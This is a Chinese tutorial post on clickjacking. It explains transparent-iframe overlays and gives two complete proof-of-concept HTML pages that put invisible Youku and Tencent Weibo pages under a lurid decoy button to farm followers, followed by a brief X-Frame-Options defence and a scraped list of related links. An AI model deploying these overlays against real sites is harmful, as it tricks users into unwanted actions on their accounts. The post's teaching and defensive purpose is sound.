什么是点击劫持

点击劫持,clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。

它是通过覆盖不可见的框架误导受害者点击。

虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面

劫持原理

攻击者使用一个透明的、不可见的iframe,覆盖(包含)一个网页,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的按钮位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。

劫持案例

  1. 点击一个表面显示是“播放”某个视频的按钮,而实际上完成的操作却是将用户的社交网站个人信息改为“公开”状态。
  2. 通过图片覆盖导致链接到一些未知的网站

    思路即为,找到有用的地方,查到坐标,放置按钮,放置诱惑信息,OK!

代码示例

优酷频道刷粉的POC

  1. <!DOCTYPE html>
    2. 

  2. <html>
    3. 

    4. 

  4. <head>
    5. 

  5.     http-equiv="Content-Type" content="text/html; charset=utf-8" />
    6. 

  6.     <title>点击劫持 POC</title>
    7. 

  7.     <style>
    8. 

  8.     iframe {
    9. 

  9.         width: 1440px;
    10. 

  10.         height: 900px;
    11. 

  11.         position: absolute;
    12. 

  12.         top: 0;
    13. 

  13.         left: 0;
    14. 

  14.         z-index: 2;
    15. 

  15.         -moz-opacity: 0;
    16. 

  16.         opacity: 0;
    17. 

  17.         filter: alpha(opacity=0)
    18. 

  18.     }
    19. 

    20. 

  20.     button {
    21. 

  21.         position: absolute;
    22. 

  22.         top: 230px;
    23. 

  23.         left: 1200px;
    24. 

  24.         z-index: 1;
    25. 

  25.         width: 80px;
    26. 

  26.         height: 20px
    27. 

  27.     }
    28. 

  28.     </style>
    29. 

  29. </head>
    30. 

    31. 

  31. <body>
    32. 

  32.     <button>点击脱衣</button>
    33. 

  33.     <img src="http://b.hiphotos.baidu.com/image/pic/item/3ac79f3df8dcd1001341dbcd768b4710b8122f78.jpg" />
    34. 

  34.     <iframe src="http://i.youku.com/u/UMjA0NTg4Njcy" scrolling="no"> </iframe>
    35. 

  35. </body>
    36. 

    37. 

  37. </html>

腾讯微博刷粉

  1. <html>
    2. 

    3. 

  3. <head>
    4. 

  4.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    5. 

  5.     <title>点击劫持 POC</title>
    6. 

  6.     <style>
    7. 

  7.     iframe {
    8. 

  8.         width: 1440px;
    9. 

  9.         height: 900px;
    10. 

  10.         position: absolute;
    11. 

  11.         top: -0px;
    12. 

  12.         left: -0px;
    13. 

  13.         z-index: 2;
    14. 

  14.         -moz-opacity: 0;
    15. 

  15.         opacity: 0;
    16. 

  16.         filter: alpha(opacity=0);
    17. 

  17.     }
    18. 

    19. 

  19.     button {
    20. 

  20.         position: absolute;
    21. 

  21.         top: 250px;
    22. 

  22.         left: 770px;
    23. 

  23.         z-index: 1;
    24. 

  24.         width: 80px;
    25. 

  25.         height: 20px;
    26. 

  26.     }
    27. 

  27.     </style>
    28. 

  28. </head>
    29. 

    30. 

  30. <body>
    31. 

  31.     <button>点击脱衣</button>
    32. 

  32.     <img src="http://b.hiphotos.baidu.com/image/pic/item/3ac79f3df8dcd1001341dbcd768b4710b8122f78.jpg" />
    33. 

  33.     <iframe src="http://search.t.qq.com/user.php?pos=436&amp;k=东北保钓" scrolling="no"></iframe>
    34. 

  34. </body>
    35. 

    36. 

  36. </html>

防御

X-FRAME-OPTIONS是目前最可靠的方法

X-FRAME-OPTIONS是微软提出的一个http头,专门用来防御利用iframe嵌套的点击劫持攻击。

并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。

这个头有三个值:

  1. DENY // 拒绝任何域加载
    2. 

  2. SAMEORIGIN // 允许同源域下加载
    3. 

  3. ALLOW-FROM // 可以定义允许frame加载的页面地址

参考:

http://www.freebuf.com/articles/web/67843.html

点击劫持(click jacking)的更多相关文章

  1. web安全:click jacking

    点击劫持  click jacking通过iframe加载被攻击网站到黑客自己维护的网站通过z-index叠加和position定位,将2个网站的信息堆叠在一个立体投影面上,通过opacity设置透明 ...

  2. 点击劫持(CLICKJACKING)与X-FRAME-OPTIONS HEADER

    转载: http://www.tuicool.com/articles/mqUBfa 目录 前言 1.1 点击劫持(clickjacking attacks) 1.2  Frame Bursters. ...

  3. XSS学习笔记(一个)-点击劫持

    所谓XSS这个场景被触发XSS地方,在大多数情况下,攻击者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻击始终触发浏览器端,攻击的者的目的.一般都是获取用户的C ...

  4. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  5. Web应用安全之点击劫持(CLICKJACKING)与X-FRAME-OPTIONS HEADER

    点击劫持(clickjacking)与X-Frame-Options Header 文/玄魂 目录 前言... 1.1 点击劫持(clickjacking attacks)... 1.2  Frame ...

  6. Web安全之点击劫持(ClickJacking)

    点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的 ...

  7. ClickJacking(点击劫持)

    问题: 点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点 ...

  8. Cookie中设置了 HttpOnly,Secure 属性,有效的防止XSS攻击,X-Frame-Options 响应头避免点击劫持

    属性介绍: 1) secure属性当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输(ssl),即 只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证, 如果是 HT ...

  9. 安全测试4_客户端的安全漏洞(XSS、CSRF、点击劫持、URL跳转)

    那个fanh前面学习的都是基础,现在开始正式学习下安全的知识,这一章主要讲解客户端常见的安全漏洞. 看到这个不错,给大家记一下: 1.常见的安全事件: 2.XSS(跨站脚本),英文全称:Cross S ...

随机推荐

  1. 关于解决百度sitemap1.0一直提示校验中问题

    实际原因是php设置问题,各个版本对应的设置有些不一样. php版本改成就好了. 修复方法:在插件里找到插件:\baidusubmit\inc.找到sitemap.php,查找curl_setopt( ...

  2. 使用virtualBox安装CentOS 6.3的详细步骤

    由于前几天把系统升级到win7了,原先安装的Linux虚拟机都不存在了.基于学习,这次安装选择的是CentOS 6.3版本. 下面就看看具体的安装步骤: 名称可以随便填写,类型选择Linux,版本选择 ...

  3. 慎用WSACleanup()

    中止Windows Sockets DLL的使用.         #include <winsock.h>         int PASCAL FAR WSACleanup ( voi ...

  4. 洛谷P4174 [NOI2006]最大获利(最大流)

    题目描述 新的技术正冲击着手机通讯市场,对于各大运营商来说,这既是机遇,更是挑战.THU 集团旗下的 CS&T 通讯公司在新一代通讯技术血战的前夜,需要做太多的准备工作,仅就站址选择一项,就需 ...

  5. CodeForces 834D The Bakery(线段树优化DP)

    Some time ago Slastyona the Sweetmaid decided to open her own bakery! She bought required ingredient ...

  6. 《T-SQL查询》- SQL逻辑处理

    下面列出SQL查询语句的一般形式,以及各个子句被逻辑处理的顺序步骤: (8) SELECT (9) DISTINCT (11) <TOP_specification> <select ...

  7. Android-获取网络图片设置壁纸

    下载图片,设置壁纸 的代码: package liudeli.async; import android.app.Activity; import android.app.ProgressDialog ...

  8. TDE--相关Demo

    SQL Server 2008引入透明数据加密(Transparent Data Encryption),它允许你完全无需修改应用程序代码而对整个数据库加密.当一个用户数据库可用且已启用TDE时,在写 ...

  9. GridView中合并单元格

    using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Da ...

  10. 纯Css3手工打造网页图片效果

    .rotate-demo { width: 220px; height: 220px; margin: 0 auto; background: no-repeat url("http://i ...